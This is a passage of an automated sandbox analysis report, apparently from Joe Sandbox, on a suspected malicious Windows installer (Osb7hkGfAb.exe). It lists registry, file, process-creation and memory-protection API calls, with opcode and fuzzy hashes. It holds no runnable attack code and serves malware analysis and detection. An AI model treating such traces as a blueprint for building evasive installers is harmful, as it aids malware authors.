                                                                  • Associated: 00000000.00000002.2637631224.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2637655464.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2637655464.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2637655464.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2637655464.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2637655464.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2637815169.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Timeout
                                                                  • String ID: !
                                                                  • API String ID: 1777923405-2657877971
                                                                  • Opcode ID: b3808b2228016cded034fddbbda71ccd0a5c26c3e8a9a8fe6146862fd49d124c
                                                                  • Instruction ID: ba3ca6c87ae36af76b9178a01453159e8aa8f3f4b54328e0dc7fa76aa85262fd
                                                                  • Opcode Fuzzy Hash: b3808b2228016cded034fddbbda71ccd0a5c26c3e8a9a8fe6146862fd49d124c
                                                                  • Instruction Fuzzy Hash: 10216071A44208BEEB05AFB5D98AAAD7FB4EF44304F20447FF502B61D1D6B88541DB28

                                                                  Control-flow Graph

                                                                  control_flow_graph 675 402476-4024a7 call 402bce * 2 call 402c5e 682 402a5a-402a69 675->682 683 4024ad-4024b7 675->683 684 4024c7-4024ca 683->684 685 4024b9-4024c6 call 402bce lstrlenA 683->685 688 4024e1-4024e4 684->688 689 4024cc-4024e0 call 402bac 684->689 685->684 693 4024f5-402509 RegSetValueExA 688->693 694 4024e6-4024f0 call 4030d8 688->694 689->688 697 40250b 693->697 698 40250e-4025eb RegCloseKey 693->698 694->693 697->698 698->682
                                                                  APIs
                                                                  • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nswE071.tmp,00000023,00000011,00000002), ref: 004024C1
                                                                  • RegSetValueExA.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nswE071.tmp,00000000,00000011,00000002), ref: 00402501
                                                                  • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nswE071.tmp,00000000,00000011,00000002), ref: 004025E5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2637585543.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2637631224.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2637655464.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2637655464.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2637655464.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2637655464.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2637655464.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2637815169.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: CloseValuelstrlen
                                                                  • String ID: C:\Users\user\AppData\Local\Temp\nswE071.tmp
                                                                  • API String ID: 2655323295-1835146548
                                                                  • Opcode ID: 7a7c23c04c90be8b3e585445916e0e680a3a1629c3414f9b9df94d306a1b16c3
                                                                  • Instruction ID: f8068cdfa95035626473adca5f51816a5c1db3e2bbb00f719c7efdf62c59a762
                                                                  • Opcode Fuzzy Hash: 7a7c23c04c90be8b3e585445916e0e680a3a1629c3414f9b9df94d306a1b16c3
                                                                  • Instruction Fuzzy Hash: 12118171E00218AFEF10AFA59E89EAE7A74EB44314F20443BF505F71D1D6B99D419B28
                                                                  APIs
                                                                  • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 004020C8
                                                                    • Part of subcall function 0040521E: lstrlenA.KERNEL32(0042A070,00000000,00424248,76F923A0,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
                                                                    • Part of subcall function 0040521E: lstrlenA.KERNEL32(00403233,0042A070,00000000,00424248,76F923A0,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
                                                                    • Part of subcall function 0040521E: lstrcatA.KERNEL32(0042A070,00403233,00403233,0042A070,00000000,00424248,76F923A0), ref: 0040527A
                                                                    • Part of subcall function 0040521E: SetWindowTextA.USER32(0042A070,0042A070), ref: 0040528C
                                                                    • Part of subcall function 0040521E: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052B2
                                                                    • Part of subcall function 0040521E: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052CC
                                                                    • Part of subcall function 0040521E: SendMessageA.USER32(?,00001013,?,00000000), ref: 004052DA
                                                                  • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 004020D8
                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 004020E8
                                                                  • FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402152
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2637585543.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2637631224.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2637655464.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2637655464.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2637655464.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2637655464.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2637655464.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2637815169.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                  • String ID:
                                                                  • API String ID: 2987980305-0
                                                                  • Opcode ID: 2b161932b8e15f20ea054abb7da5fd45cac2ee1996f8da02ed958f71ebdc799e
                                                                  • Instruction ID: f7200b9d034bcb950a45a2beb12b39e5fe5f048be62c56950c98b25cd9e943c1
                                                                  • Opcode Fuzzy Hash: 2b161932b8e15f20ea054abb7da5fd45cac2ee1996f8da02ed958f71ebdc799e
                                                                  • Instruction Fuzzy Hash: 7A21C932600115EBCF207FA58F49A5F76B1AF14359F20423BF651B61D1CABC89829A5E
                                                                  APIs
                                                                    • Part of subcall function 00405B28: CharNextA.USER32(?,?,0042BC98,?,00405B94,0042BC98,0042BC98,76F93410,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,76F93410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B36
                                                                    • Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B3B
                                                                    • Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B4F
                                                                  • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D
                                                                    • Part of subcall function 004056E4: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405727
                                                                  • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\tranchet\Trykmaalere,00000000,00000000,000000F0), ref: 0040163C
                                                                  Strings
                                                                  • C:\Users\user\tranchet\Trykmaalere, xrefs: 00401631
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2637585543.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2637631224.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2637655464.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2637655464.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2637655464.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2637655464.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2637655464.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2637815169.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                  • String ID: C:\Users\user\tranchet\Trykmaalere
                                                                  • API String ID: 1892508949-3491094995
                                                                  • Opcode ID: 6f48d1f4569c46ba79332d618e5f2744522d6a7c4d3c9928c8ba38f6ac20f072
                                                                  • Instruction ID: 2360f0c6ce39ff042ef5b5b007943225e6ab3dc636003d735fb75761c746189e
                                                                  • Opcode Fuzzy Hash: 6f48d1f4569c46ba79332d618e5f2744522d6a7c4d3c9928c8ba38f6ac20f072
                                                                  • Instruction Fuzzy Hash: C1110431204141EBCB307FB55D419BF37B09A52725B284A7FE591B22E3DA3D4943AA2E
                                                                  APIs
                                                                  • RegQueryValueExA.KERNELBASE(?,?,00000000,?,?,00000400,Call,0042A070,?,?,?,00000002,Call,?,00406293,80000002), ref: 00406024
                                                                  • RegCloseKey.KERNELBASE(?,?,00406293,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,?,0042A070), ref: 0040602F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2637585543.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2637631224.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2637655464.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2637655464.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2637655464.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2637655464.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2637655464.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2637815169.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: CloseQueryValue
                                                                  • String ID: Call
                                                                  • API String ID: 3356406503-1824292864
                                                                  • Opcode ID: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
                                                                  • Instruction ID: 43fb42cdfa68b2f9ef01d23c83e90927a4e1ed7766022ad00d18a88e1c3f91d6
                                                                  • Opcode Fuzzy Hash: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
                                                                  • Instruction Fuzzy Hash: 9F01BC72100209ABCF22CF20CC09FDB3FA9EF45364F00403AF916A2191D238C968CBA4
                                                                  APIs
                                                                  • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042C098,Error launching installer), ref: 004057BF
                                                                  • CloseHandle.KERNEL32(?), ref: 004057CC
                                                                  Strings
                                                                  • Error launching installer, xrefs: 004057A9
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2637585543.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2637631224.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2637655464.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2637655464.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2637655464.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2637655464.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2637655464.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2637815169.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: CloseCreateHandleProcess
                                                                  • String ID: Error launching installer
                                                                  • API String ID: 3712363035-66219284
                                                                  • Opcode ID: de0eed9ff358aa0300570f89c8dde483a6f9bec5cddf33796de70880124f880f
                                                                  • Instruction ID: 4c3df7556a0b034395016ee82922b733160aa74f7bc511f6187c6ec266d632ef
                                                                  • Opcode Fuzzy Hash: de0eed9ff358aa0300570f89c8dde483a6f9bec5cddf33796de70880124f880f
                                                                  • Instruction Fuzzy Hash: 4DE0B6B4600209BFEB109BA4ED89F7F7BBCEB04604F504525BE59F2290E67498199A7C
                                                                  APIs
                                                                  • RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025BA
                                                                  • RegEnumValueA.ADVAPI32(00000000,00000000,?,?), ref: 004025CD
                                                                  • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nswE071.tmp,00000000,00000011,00000002), ref: 004025E5
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2637585543.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2637631224.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2637655464.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2637655464.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2637655464.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2637655464.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2637655464.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2637815169.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: Enum$CloseValue
                                                                  • String ID:
                                                                  • API String ID: 397863658-0
                                                                  • Opcode ID: 7b99555fd6f8dae37ea9679ab54f9e8123d87756e6997b06f3b56209368cff92
                                                                  • Instruction ID: ee0fd62ac357f9525b55a30647733f0e3798e9bebba0400de635a53faed38b57
                                                                  • Opcode Fuzzy Hash: 7b99555fd6f8dae37ea9679ab54f9e8123d87756e6997b06f3b56209368cff92
                                                                  • Instruction Fuzzy Hash: 22017C71604204FFE7219F549E99ABF7ABCEF40358F20403EF505A61C0DAB88A459629
                                                                  APIs
                                                                  • RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 00402546
                                                                  • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nswE071.tmp,00000000,00000011,00000002), ref: 004025E5
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2637585543.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2637631224.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2637655464.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2637655464.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2637655464.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2637655464.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2637655464.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2637815169.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: CloseQueryValue
                                                                  • String ID:
                                                                  • API String ID: 3356406503-0
                                                                  • Opcode ID: 6213eafd8b46f955f614869397e07eb9b1fadeed980eca135cc1a2a492507a25
                                                                  • Instruction ID: 101e8c123746c764c526cee79e76b60048690b918ccacca24166b7bb3c1ff757
                                                                  • Opcode Fuzzy Hash: 6213eafd8b46f955f614869397e07eb9b1fadeed980eca135cc1a2a492507a25
                                                                  • Instruction Fuzzy Hash: EA11C171A00205EFDF25DF64CE985AE7AB4EF00355F20843FE446B72C0D6B88A86DB19
                                                                  APIs
                                                                  • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                  • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend
                                                                  • String ID:
                                                                  • API String ID: 3850602802-0
                                                                  APIs
                                                                  • RegDeleteValueA.ADVAPI32(00000000,00000000,00000033), ref: 00402442
                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0040244B
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: CloseDeleteValue
                                                                  • String ID:
                                                                  • API String ID: 2831762973-0
                                                                  APIs
                                                                  • ShowWindow.USER32(00000000,00000000), ref: 00401EE3
                                                                  • EnableWindow.USER32(00000000,00000000), ref: 00401EEE
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: Window$EnableShow
                                                                  • String ID:
                                                                  • API String ID: 1136574915-0
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(?,?,?,004033BB,0000000B), ref: 00406512
                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 0040652D
                                                                    • Part of subcall function 00406492: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004064A9
                                                                    • Part of subcall function 00406492: wsprintfA.USER32 ref: 004064E2
                                                                    • Part of subcall function 00406492: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004064F6
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                  • String ID:
                                                                  • API String ID: 2547128583-0
                                                                  APIs
                                                                  • GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\Osb7hkGfAb.exe,80000000,00000003), ref: 00405C94
                                                                  • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405CB6
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: File$AttributesCreate
                                                                  • String ID:
                                                                  • API String ID: 415043291-0
                                                                  APIs
                                                                  • CreateDirectoryA.KERNELBASE(?,00000000,0040333B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 00405767
                                                                  • GetLastError.KERNEL32(?,00000007,00000009,0000000B), ref: 00405775
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: CreateDirectoryErrorLast
                                                                  • String ID:
                                                                  • API String ID: 1375471231-0
                                                                  APIs
                                                                  • VirtualAllocEx.KERNELBASE(00000000), ref: 6FF82AF7
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2668548574.000000006FF81000.00000020.00000001.01000000.00000005.sdmp, Offset: 6FF80000, based on PE: true
                                                                  • Associated: 00000000.00000002.2666689682.000000006FF80000.00000002.00000001.01000000.00000005.sdmp
                                                                  • Associated: 00000000.00000002.2668568921.000000006FF83000.00000002.00000001.01000000.00000005.sdmp
                                                                  • Associated: 00000000.00000002.2668596503.000000006FF85000.00000002.00000001.01000000.00000005.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6ff80000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: AllocVirtual
                                                                  • String ID:
                                                                  • API String ID: 4275171209-0
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: wsprintf
                                                                  • String ID:
                                                                  • API String ID: 2111968516-0
                                                                  APIs
                                                                  • MoveFileA.KERNEL32(00000000,00000000), ref: 00401685
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: FileMove
                                                                  • String ID:
                                                                  • API String ID: 3562171763-0
                                                                  APIs
                                                                  • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 00402749
                                                                    • Part of subcall function 00406055: wsprintfA.USER32 ref: 00406062
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: FilePointerwsprintf
                                                                  • String ID:
                                                                  • API String ID: 327478801-0
                                                                  APIs
                                                                  • WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 004023D5
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: PrivateProfileStringWrite
                                                                  • String ID:
                                                                  • API String ID: 390214022-0
                                                                  APIs
                                                                  • SearchPathA.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 00401733
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: PathSearch
                                                                  • String ID:
                                                                  • API String ID: 2203818243-0
                                                                  APIs
                                                                  • RegCreateKeyExA.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402C7F,00000000,?,?), ref: 00405FD4
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: Create
                                                                  • String ID:
                                                                  • API String ID: 2289755597-0
                                                                  APIs
                                                                  • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004032FD,00000000,00000000,00403127,000000FF,00000004,00000000,00000000,00000000), ref: 00405D1C
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: FileRead
                                                                  • String ID:
                                                                  • API String ID: 2738559852-0
                                                                  APIs
                                                                  • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004032B3,00000000,0041D448,000000FF,0041D448,000000FF,000000FF,00000004,00000000), ref: 00405D4B
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: FileWrite
                                                                  • String ID:
                                                                  • API String ID: 3934441357-0
                                                                  APIs
                                                                  • VirtualProtect.KERNELBASE(6FF8404C,00000004,00000040,6FF8403C), ref: 6FF8293F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2668548574.000000006FF81000.00000020.00000001.01000000.00000005.sdmp, Offset: 6FF80000, based on PE: true
                                                                  • Associated: 00000000.00000002.2666689682.000000006FF80000.00000002.00000001.01000000.00000005.sdmp
                                                                  • Associated: 00000000.00000002.2668568921.000000006FF83000.00000002.00000001.01000000.00000005.sdmp
                                                                  • Associated: 00000000.00000002.2668596503.000000006FF85000.00000002.00000001.01000000.00000005.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6ff80000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: ProtectVirtual
                                                                  • String ID:
                                                                  • API String ID: 544645111-0
                                                                  APIs
                                                                  • GetPrivateProfileStringA.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 00402413
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: PrivateProfileString
                                                                  • String ID:
                                                                  • API String ID: 1096422788-0
                                                                  APIs
                                                                  • RegOpenKeyExA.KERNELBASE(00000000,?,00000000,?,?,0042A070,?,?,0040600B,0042A070,?,?,?,00000002,Call), ref: 00405FA1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                  Similarity
                                                                  • API ID: Open
                                                                  • String ID:
                                                                  • API String ID: 71445658-0
                                                                  APIs
                                                                  • SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A8
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2637606697.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
